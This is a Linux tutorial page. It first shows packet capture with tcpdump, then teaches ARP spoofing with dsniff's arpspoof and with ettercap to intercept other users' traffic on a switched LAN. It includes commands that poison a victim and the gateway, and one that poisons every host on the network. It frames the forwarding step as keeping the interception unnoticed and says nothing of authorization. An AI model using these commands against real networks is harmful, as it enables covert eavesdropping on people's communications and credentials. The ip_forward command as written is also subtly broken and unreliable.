Capture and read network traffic in Linux:

  1. Launch terminal.
  2. Identify the network interface that you want to capture the network traffic packets.
    $ ip address show
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
        link/ether 00:0c:29:2c:c1:16 brd ff:ff:ff:ff:ff:ff
        inet 192.168.111.201/24 brd 192.168.111.255 scope global dynamic ens33
           valid_lft 1691sec preferred_lft 1691sec
        inet6 fe80::20c:29ff:fe2c:c116/64 scope link
           valid_lft forever preferred_lft forever
  3. Install tcpdump for your operating distribution.
    $ sudo apt update && sudo apt install --assume-yes tcpdump # Ubuntu and Debian
  4. Run tcpdump against the network interface that you've selected.
    $ sudo tcpdump --interface=ens33
  5. Set a filter to view network only for and from a specific IP address.
    $ sudo tcpdump --interface=ens33 host 192.168.111.2
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    05:33:00.600161 IP host > _gateway: ICMP echo request, id 1625, seq 1, length 64
    05:33:00.600286 IP _gateway > host: ICMP echo reply, id 1625, seq 1, length 64
    05:33:00.602106 IP host.41923 > _gateway.domain: 57259+ PTR? 2.111.168.192.in-addr.arpa. (44)
    05:33:00.616784 IP _gateway.domain > host.41923: 57259 NXDomain*- 0/0/0 (44)
  6. Disable resolution of IP address to names.
    $ sudo tcpdump --interface=ens33 host 192.168.111.2 -n
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    05:35:13.914066 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 3, length 64
    05:35:13.914414 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 3, length 64
    05:35:14.937278 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 4, length 64
    05:35:14.937723 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 4, length 64
  7. Filter specific port.
    $ sudo tcpdump --interface=ens33  port 80
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    05:40:12.229010 IP host.53904 > _gateway.http: Flags [S], seq 908428722, win 64240, options [mss 1460,sackOK,TS val 3777051478 ecr 0,nop,wscale 7], length 0
    05:40:12.229182 IP _gateway.http > host.53904: Flags [R.], seq 0, ack 908428723, win 32767, length 0

A network switch doesn’t foward packets to everyone in the network the same way as a network hub do, and so theoretically a person in the network cannot look at other person’s traffic. There are ways however to get through this problem, which is by performing arp spoofing.

Method 1: Dsniff

This guide will just discuss how it is done without discussing the theory behind the process. To start is to install the necessary program, which is in this case is dsniff package which contains the arpspoof program that we need. In Ubuntu or any other Debian based distribution, it’s installable with the apt-get command as the following;

Installing (Ubuntu)

$ sudo apt install --assume-yes dsniff

Enable IP forwarding

To make sure the traffic is forwarded to the real destination as it reach our machine, the following command need to be run;

$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward

This will make sure the connection of the target machine is not disconnected, and nobody should realize what we’re doing.

Run ARP spoofing

The following command will tell the gateway “I am 192.168.0.100”, and the next command tells 192.168.0.100 “I am the gateway”

$ sudo arpspoof 192.168.0.100 -t 192.168.0.1
$ sudo  arpspoof 192.168.0.1 -t 192.168.0.100

With this, all the traffic that’s supposed to go to the gateway from the machine, and the other way around, will go through our machine first, and only then forwarded to the real target. With this we can run any packet analysis tool such as tcpdump or wireshark.

Method 2 : Ettercap

There are programs however to make the whole process simpler. One of the favored program for this is ettercap. Ettercap can perform arp spoofing as well, among many other features that it has. In Ubuntu, the package is called ettercap-gtk;

Installing (Ubuntu)

$ sudo apt install --assume-yes ettercap-gtk

Run ARP spoofing (GUI)

Running the program with the -G switch will run it in GTK rather than in ncurses.

$ sudo ettercap -G

At the menu, choose the following;

Sniff -> Unfied sniffing

And at the prompt, choose the network interface to be used. Normally it would be eth0

Network Interface: eth0

At the menu again, choose the following to add all hosts in the network to the list

Hosts -> Scan for hosts

And following the following will do the arp spoofing for everyone in the network

Mitm -> Arp poisoning -> Ok
Start -> Start sniffing

Run ARP spoofing (command)

The following command will do the same thing as the above example, in one single command;

$ sudo ettercap -q -T -M arp // //
Leave a comment:
Share!